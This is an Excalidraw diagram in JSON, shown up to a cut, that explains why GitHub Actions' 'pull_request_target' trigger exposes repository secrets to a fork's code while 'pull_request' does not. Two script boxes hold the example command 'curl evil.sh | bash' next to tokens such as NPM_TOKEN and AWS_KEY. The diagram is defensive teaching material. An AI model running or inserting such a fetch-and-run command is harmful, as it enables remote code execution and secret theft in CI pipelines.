{
  "type": "excalidraw",
  "version": 2,
  "source": "https://excalidraw.com",
  "elements": [
    {
      "type": "text",
      "id": "title",
      "x": 480,
      "y": 30,
      "width": 880,
      "height": 40,
      "text": "the trigger picks the blast radius",
      "originalText": "the trigger picks the blast radius",
      "fontSize": 32,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "top",
      "strokeColor": "#1e40af",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 100001,
      "version": 1,
      "versionNonce": 100002,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": null,
      "lineHeight": 1.25
    },
    {
      "type": "text",
      "id": "subtitle",
      "x": 380,
      "y": 78,
      "width": 1080,
      "height": 22,
      "text": "same workflow yaml, two different `on:` lines, two different threat models.",
      "originalText": "same workflow yaml, two different `on:` lines, two different threat models.",
      "fontSize": 16,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "top",
      "strokeColor": "#64748b",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 100003,
      "version": 1,
      "versionNonce": 100004,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": null,
      "lineHeight": 1.25
    },

    {
      "type": "rectangle",
      "id": "left_tag",
      "x": 250,
      "y": 140,
      "width": 360,
      "height": 44,
      "strokeColor": "#b91c1c",
      "backgroundColor": "#fecaca",
      "fillStyle": "hachure",
      "strokeWidth": 2,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 200001,
      "version": 1,
      "versionNonce": 200002,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": [{"id": "left_tag_text", "type": "text"}],
      "link": null,
      "locked": false,
      "roundness": {"type": 3}
    },
    {
      "type": "text",
      "id": "left_tag_text",
      "x": 260,
      "y": 150,
      "width": 340,
      "height": 24,
      "text": "on: pull_request_target",
      "originalText": "on: pull_request_target",
      "fontSize": 20,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "middle",
      "strokeColor": "#7f1d1d",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 200003,
      "version": 1,
      "versionNonce": 200004,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": "left_tag",
      "lineHeight": 1.25
    },
    {
      "type": "line",
      "id": "left_boundary",
      "x": 430,
      "y": 220,
      "width": 0,
      "height": 380,
      "strokeColor": "#64748b",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 2,
      "strokeStyle": "dashed",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 200010,
      "version": 1,
      "versionNonce": 200011,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "points": [[0, 0], [0, 380]]
    },
    {
      "type": "text",
      "id": "left_boundary_label",
      "x": 280,
      "y": 230,
      "width": 300,
      "height": 18,
      "text": "fork / base trust boundary",
      "originalText": "fork / base trust boundary",
      "fontSize": 13,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "top",
      "strokeColor": "#64748b",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 200012,
      "version": 1,
      "versionNonce": 200013,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": null,
      "lineHeight": 1.25
    },
    {
      "type": "text",
      "id": "left_fork_label",
      "x": 130,
      "y": 260,
      "width": 280,
      "height": 16,
      "text": "fork (attacker-controlled)",
      "originalText": "fork (attacker-controlled)",
      "fontSize": 13,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "top",
      "strokeColor": "#64748b",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 200014,
      "version": 1,
      "versionNonce": 200015,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": null,
      "lineHeight": 1.25
    },
    {
      "type": "text",
      "id": "left_base_label",
      "x": 450,
      "y": 260,
      "width": 280,
      "height": 16,
      "text": "base repo (privileged context)",
      "originalText": "base repo (privileged context)",
      "fontSize": 13,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "top",
      "strokeColor": "#64748b",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 200016,
      "version": 1,
      "versionNonce": 200017,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": null,
      "lineHeight": 1.25
    },

    {
      "type": "rectangle",
      "id": "left_fork_box",
      "x": 150,
      "y": 290,
      "width": 240,
      "height": 200,
      "strokeColor": "#1e40af",
      "backgroundColor": "#dbeafe",
      "fillStyle": "hachure",
      "strokeWidth": 2,
      "strokeStyle": "dashed",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 200020,
      "version": 1,
      "versionNonce": 200021,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": [{"id": "left_fork_pr_text", "type": "text"}, {"id": "arrow_checkout_left", "type": "arrow"}],
      "link": null,
      "locked": false,
      "roundness": {"type": 3}
    },
    {
      "type": "text",
      "id": "left_fork_pr_text",
      "x": 160,
      "y": 305,
      "width": 220,
      "height": 22,
      "text": "attacker's fork pr",
      "originalText": "attacker's fork pr",
      "fontSize": 16,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "top",
      "strokeColor": "#1e3a5f",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 200022,
      "version": 1,
      "versionNonce": 200023,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": "left_fork_box",
      "lineHeight": 1.25
    },
    {
      "type": "rectangle",
      "id": "left_script_box",
      "x": 180,
      "y": 360,
      "width": 180,
      "height": 100,
      "strokeColor": "#b91c1c",
      "backgroundColor": "#fee2e2",
      "fillStyle": "hachure",
      "strokeWidth": 2,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 200024,
      "version": 1,
      "versionNonce": 200025,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": [{"id": "left_script_text", "type": "text"}],
      "link": null,
      "locked": false,
      "roundness": {"type": 3}
    },
    {
      "type": "text",
      "id": "left_script_text",
      "x": 190,
      "y": 380,
      "width": 160,
      "height": 60,
      "text": "modified\nscript.sh\n(curl evil.sh | bash)",
      "originalText": "modified\nscript.sh\n(curl evil.sh | bash)",
      "fontSize": 14,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "middle",
      "strokeColor": "#7f1d1d",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 200026,
      "version": 1,
      "versionNonce": 200027,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": "left_script_box",
      "lineHeight": 1.25
    },

    {
      "type": "rectangle",
      "id": "left_runner_box",
      "x": 470,
      "y": 290,
      "width": 260,
      "height": 200,
      "strokeColor": "#c2410c",
      "backgroundColor": "#fed7aa",
      "fillStyle": "hachure",
      "strokeWidth": 2,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 200030,
      "version": 1,
      "versionNonce": 200031,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": [{"id": "left_runner_text", "type": "text"}, {"id": "arrow_checkout_left", "type": "arrow"}],
      "link": null,
      "locked": false,
      "roundness": {"type": 3}
    },
    {
      "type": "text",
      "id": "left_runner_text",
      "x": 480,
      "y": 305,
      "width": 240,
      "height": 22,
      "text": "runner (base ctx)",
      "originalText": "runner (base ctx)",
      "fontSize": 16,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "top",
      "strokeColor": "#7c2d12",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 200032,
      "version": 1,
      "versionNonce": 200033,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": "left_runner_box",
      "lineHeight": 1.25
    },
    {
      "type": "rectangle",
      "id": "left_keyring_box",
      "x": 500,
      "y": 360,
      "width": 200,
      "height": 100,
      "strokeColor": "#b91c1c",
      "backgroundColor": "#fecaca",
      "fillStyle": "solid",
      "strokeWidth": 2,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 200034,
      "version": 1,
      "versionNonce": 200035,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": [{"id": "left_keyring_text", "type": "text"}],
      "link": null,
      "locked": false,
      "roundness": {"type": 3}
    },
    {
      "type": "text",
      "id": "left_keyring_text",
      "x": 510,
      "y": 372,
      "width": 180,
      "height": 76,
      "text": "secrets.*\nNPM_TOKEN\nAWS_KEY\nGH_PAT",
      "originalText": "secrets.*\nNPM_TOKEN\nAWS_KEY\nGH_PAT",
      "fontSize": 14,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "middle",
      "strokeColor": "#7f1d1d",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 200036,
      "version": 1,
      "versionNonce": 200037,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": "left_keyring_box",
      "lineHeight": 1.25
    },

    {
      "type": "arrow",
      "id": "arrow_checkout_left",
      "x": 360,
      "y": 410,
      "width": 130,
      "height": 0,
      "strokeColor": "#b91c1c",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 3,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 200040,
      "version": 1,
      "versionNonce": 200041,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "points": [[0, 0], [130, 0]],
      "startBinding": {"elementId": "left_script_box", "focus": 0, "gap": 2},
      "endBinding": {"elementId": "left_runner_box", "focus": 0, "gap": 2},
      "startArrowhead": null,
      "endArrowhead": "arrow"
    },
    {
      "type": "rectangle",
      "id": "left_callout_box",
      "x": 150,
      "y": 520,
      "width": 580,
      "height": 56,
      "strokeColor": "#b91c1c",
      "backgroundColor": "#fee2e2",
      "fillStyle": "hachure",
      "strokeWidth": 2,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 200050,
      "version": 1,
      "versionNonce": 200051,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": [{"id": "left_callout_text", "type": "text"}],
      "link": null,
      "locked": false,
      "roundness": {"type": 3}
    },
    {
      "type": "text",
      "id": "left_callout_text",
      "x": 160,
      "y": 532,
      "width": 560,
      "height": 32,
      "text": "this is the part that runs attacker code",
      "originalText": "this is the part that runs attacker code",
      "fontSize": 18,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "middle",
      "strokeColor": "#7f1d1d",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 200052,
      "version": 1,
      "versionNonce": 200053,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": "left_callout_box",
      "lineHeight": 1.25
    },
    {
      "type": "arrow",
      "id": "left_callout_arrow",
      "x": 430,
      "y": 510,
      "width": 0,
      "height": -85,
      "strokeColor": "#b91c1c",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 2,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 200054,
      "version": 1,
      "versionNonce": 200055,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "points": [[0, 0], [0, -85]],
      "startArrowhead": null,
      "endArrowhead": "arrow"
    },

    {
      "type": "rectangle",
      "id": "right_tag",
      "x": 1080,
      "y": 140,
      "width": 360,
      "height": 44,
      "strokeColor": "#047857",
      "backgroundColor": "#a7f3d0",
      "fillStyle": "hachure",
      "strokeWidth": 2,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 300001,
      "version": 1,
      "versionNonce": 300002,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": [{"id": "right_tag_text", "type": "text"}],
      "link": null,
      "locked": false,
      "roundness": {"type": 3}
    },
    {
      "type": "text",
      "id": "right_tag_text",
      "x": 1090,
      "y": 150,
      "width": 340,
      "height": 24,
      "text": "on: pull_request",
      "originalText": "on: pull_request",
      "fontSize": 20,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "middle",
      "strokeColor": "#064e3b",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 300003,
      "version": 1,
      "versionNonce": 300004,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": "right_tag",
      "lineHeight": 1.25
    },
    {
      "type": "line",
      "id": "right_boundary",
      "x": 1260,
      "y": 220,
      "width": 0,
      "height": 380,
      "strokeColor": "#64748b",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 2,
      "strokeStyle": "dashed",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 300010,
      "version": 1,
      "versionNonce": 300011,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "points": [[0, 0], [0, 380]]
    },
    {
      "type": "text",
      "id": "right_boundary_label",
      "x": 1110,
      "y": 230,
      "width": 300,
      "height": 18,
      "text": "fork / base trust boundary",
      "originalText": "fork / base trust boundary",
      "fontSize": 13,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "top",
      "strokeColor": "#64748b",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 300012,
      "version": 1,
      "versionNonce": 300013,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": null,
      "lineHeight": 1.25
    },
    {
      "type": "text",
      "id": "right_fork_label",
      "x": 960,
      "y": 260,
      "width": 280,
      "height": 16,
      "text": "fork (attacker-controlled)",
      "originalText": "fork (attacker-controlled)",
      "fontSize": 13,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "top",
      "strokeColor": "#64748b",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 300014,
      "version": 1,
      "versionNonce": 300015,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": null,
      "lineHeight": 1.25
    },
    {
      "type": "text",
      "id": "right_base_label",
      "x": 1280,
      "y": 260,
      "width": 280,
      "height": 16,
      "text": "base repo (fork-fenced ctx)",
      "originalText": "base repo (fork-fenced ctx)",
      "fontSize": 13,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "top",
      "strokeColor": "#64748b",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 300016,
      "version": 1,
      "versionNonce": 300017,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": null,
      "lineHeight": 1.25
    },

    {
      "type": "rectangle",
      "id": "right_fork_box",
      "x": 980,
      "y": 290,
      "width": 240,
      "height": 200,
      "strokeColor": "#1e40af",
      "backgroundColor": "#dbeafe",
      "fillStyle": "hachure",
      "strokeWidth": 2,
      "strokeStyle": "dashed",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 300020,
      "version": 1,
      "versionNonce": 300021,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": [{"id": "right_fork_pr_text", "type": "text"}, {"id": "arrow_checkout_right", "type": "arrow"}],
      "link": null,
      "locked": false,
      "roundness": {"type": 3}
    },
    {
      "type": "text",
      "id": "right_fork_pr_text",
      "x": 990,
      "y": 305,
      "width": 220,
      "height": 22,
      "text": "attacker's fork pr",
      "originalText": "attacker's fork pr",
      "fontSize": 16,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "top",
      "strokeColor": "#1e3a5f",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 300022,
      "version": 1,
      "versionNonce": 300023,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": "right_fork_box",
      "lineHeight": 1.25
    },
    {
      "type": "rectangle",
      "id": "right_script_box",
      "x": 1010,
      "y": 360,
      "width": 180,
      "height": 100,
      "strokeColor": "#b91c1c",
      "backgroundColor": "#fee2e2",
      "fillStyle": "hachure",
      "strokeWidth": 2,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 300024,
      "version": 1,
      "versionNonce": 300025,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": [{"id": "right_script_text", "type": "text"}],
      "link": null,
      "locked": false,
      "roundness": {"type": 3}
    },
    {
      "type": "text",
      "id": "right_script_text",
      "x": 1020,
      "y": 380,
      "width": 160,
      "height": 60,
      "text": "modified\nscript.sh\n(curl evil.sh | bash)",
      "originalText": "modified\nscript.sh\n(curl evil.sh | bash)",
      "fontSize": 14,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "middle",
      "strokeColor": "#7f1d1d",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 300026,
      "version": 1,
      "versionNonce": 300027,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": "right_script_box",
      "lineHeight": 1.25
    },

    {
      "type": "rectangle",
      "id": "right_runner_box",
      "x": 1300,
      "y": 290,
      "width": 260,
      "height": 200,
      "strokeColor": "#c2410c",
      "backgroundColor": "#fed7aa",
      "fillStyle": "hachure",
      "strokeWidth": 2,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 300030,
      "version": 1,
      "versionNonce": 300031,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": [{"id": "right_runner_text", "type": "text"}, {"id": "arrow_checkout_right", "type": "arrow"}],
      "link": null,
      "locked": false,
      "roundness": {"type": 3}
    },
    {
      "type": "text",
      "id": "right_runner_text",
      "x": 1310,
      "y": 305,
      "width": 240,
      "height": 22,
      "text": "runner (fork ctx)",
      "originalText": "runner (fork ctx)",
      "fontSize": 16,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "top",
      "strokeColor": "#7c2d12",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 300032,
      "version": 1,
      "versionNonce": 300033,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": "right_runner_box",
      "lineHeight": 1.25
    },
    {
      "type": "rectangle",
      "id": "right_keyring_box",
      "x": 1330,
      "y": 360,
      "width": 200,
      "height": 100,
      "strokeColor": "#94a3b8",
      "backgroundColor": "#f1f5f9",
      "fillStyle": "hachure",
      "strokeWidth": 2,
      "strokeStyle": "dashed",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 300034,
      "version": 1,
      "versionNonce": 300035,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": [{"id": "right_keyring_text", "type": "text"}],
      "link": null,
      "locked": false,
      "roundness": {"type": 3}
    },
    {
      "type": "text",
      "id": "right_keyring_text",
      "x": 1340,
      "y": 380,
      "width": 180,
      "height": 60,
      "text": "secrets.*\nnot in scope\n(empty bag)",
      "originalText": "secrets.*\nnot in scope\n(empty bag)",
      "fontSize": 14,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "middle",
      "strokeColor": "#64748b",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 300036,
      "version": 1,
      "versionNonce": 300037,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": "right_keyring_box",
      "lineHeight": 1.25
    },

    {
      "type": "arrow",
      "id": "arrow_checkout_right",
      "x": 1190,
      "y": 410,
      "width": 130,
      "height": 0,
      "strokeColor": "#64748b",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 2,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 300040,
      "version": 1,
      "versionNonce": 300041,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "points": [[0, 0], [130, 0]],
      "startBinding": {"elementId": "right_script_box", "focus": 0, "gap": 2},
      "endBinding": {"elementId": "right_runner_box", "focus": 0, "gap": 2},
      "startArrowhead": null,
      "endArrowhead": "arrow"
    },
    {
      "type": "rectangle",
      "id": "right_callout_box",
      "x": 980,
      "y": 520,
      "width": 580,
      "height": 56,
      "strokeColor": "#047857",
      "backgroundColor": "#a7f3d0",
      "fillStyle": "hachure",
      "strokeWidth": 2,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 300050,
      "version": 1,
      "versionNonce": 300051,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": [{"id": "right_callout_text", "type": "text"}],
      "link": null,
      "locked": false,
      "roundness": {"type": 3}
    },
    {
      "type": "text",
      "id": "right_callout_text",
      "x": 990,
      "y": 528,
      "width": 560,
      "height": 40,
      "text": "no secrets in scope. attacker code stays attacker-jailed.",
      "originalText": "no secrets in scope. attacker code stays attacker-jailed.",
      "fontSize": 17,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "middle",
      "strokeColor": "#064e3b",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 300052,
      "version": 1,
      "versionNonce": 300053,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": "right_callout_box",
      "lineHeight": 1.25
    },
    {
      "type": "arrow",
      "id": "right_callout_arrow",
      "x": 1430,
      "y": 510,
      "width": 0,
      "height": -45,
      "strokeColor": "#047857",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 2,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 300054,
      "version": 1,
      "versionNonce": 300055,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "points": [[0, 0], [0, -45]],
      "startArrowhead": null,
      "endArrowhead": "arrow"
    },

    {
      "type": "line",
      "id": "panel_divider",
      "x": 840,
      "y": 140,
      "width": 0,
      "height": 460,
      "strokeColor": "#cbd5e1",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "dashed",
      "roughness": 0,
      "opacity": 100,
      "angle": 0,
      "seed": 400001,
      "version": 1,
      "versionNonce": 400002,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "points": [[0, 0], [0, 460]]
    },

    {
      "type": "text",
      "id": "summary_eyebrow",
      "x": 657,
      "y": 640,
      "width": 200,
      "height": 22,
      "text": "the math:",
      "originalText": "the math:",
      "fontSize": 16,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "top",
      "strokeColor": "#1e40af",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 500001,
      "version": 1,
      "versionNonce": 500002,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": null,
      "lineHeight": 1.25
    },

    {
      "type": "ellipse",
      "id": "sum_dot_1",
      "x": 220,
      "y": 706,
      "width": 14,
      "height": 14,
      "strokeColor": "#1e40af",
      "backgroundColor": "#1e40af",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 500010,
      "version": 1,
      "versionNonce": 500011,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false
    },
    {
      "type": "text",
      "id": "sum_text_1",
      "x": 150,
      "y": 728,
      "width": 160,
      "height": 22,
      "text": "same workflow",
      "originalText": "same workflow",
      "fontSize": 15,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "top",
      "strokeColor": "#1f2937",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 500012,
      "version": 1,
      "versionNonce": 500013,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": null,
      "lineHeight": 1.25
    },
    {
      "type": "line",
      "id": "sum_line_12",
      "x": 240,
      "y": 713,
      "width": 320,
      "height": 0,
      "strokeColor": "#64748b",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 500014,
      "version": 1,
      "versionNonce": 500015,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "points": [[0, 0], [320, 0]]
    },
    {
      "type": "text",
      "id": "sum_arrow_1",
      "x": 380,
      "y": 700,
      "width": 40,
      "height": 22,
      "text": "→",
      "originalText": "→",
      "fontSize": 22,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "top",
      "strokeColor": "#64748b",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 500016,
      "version": 1,
      "versionNonce": 500017,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": null,
      "lineHeight": 1.25
    },

    {
      "type": "ellipse",
      "id": "sum_dot_2",
      "x": 560,
      "y": 706,
      "width": 14,
      "height": 14,
      "strokeColor": "#c2410c",
      "backgroundColor": "#c2410c",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 500020,
      "version": 1,
      "versionNonce": 500021,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false
    },
    {
      "type": "text",
      "id": "sum_text_2",
      "x": 470,
      "y": 728,
      "width": 200,
      "height": 22,
      "text": "different trigger",
      "originalText": "different trigger",
      "fontSize": 15,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "top",
      "strokeColor": "#7c2d12",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 500022,
      "version": 1,
      "versionNonce": 500023,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": null,
      "lineHeight": 1.25
    },
    {
      "type": "line",
      "id": "sum_line_23",
      "x": 580,
      "y": 713,
      "width": 320,
      "height": 0,
      "strokeColor": "#64748b",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 500024,
      "version": 1,
      "versionNonce": 500025,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "points": [[0, 0], [320, 0]]
    },
    {
      "type": "text",
      "id": "sum_arrow_2",
      "x": 720,
      "y": 700,
      "width": 40,
      "height": 22,
      "text": "→",
      "originalText": "→",
      "fontSize": 22,
      "fontFamily": 3,
      "textAlign": "center",
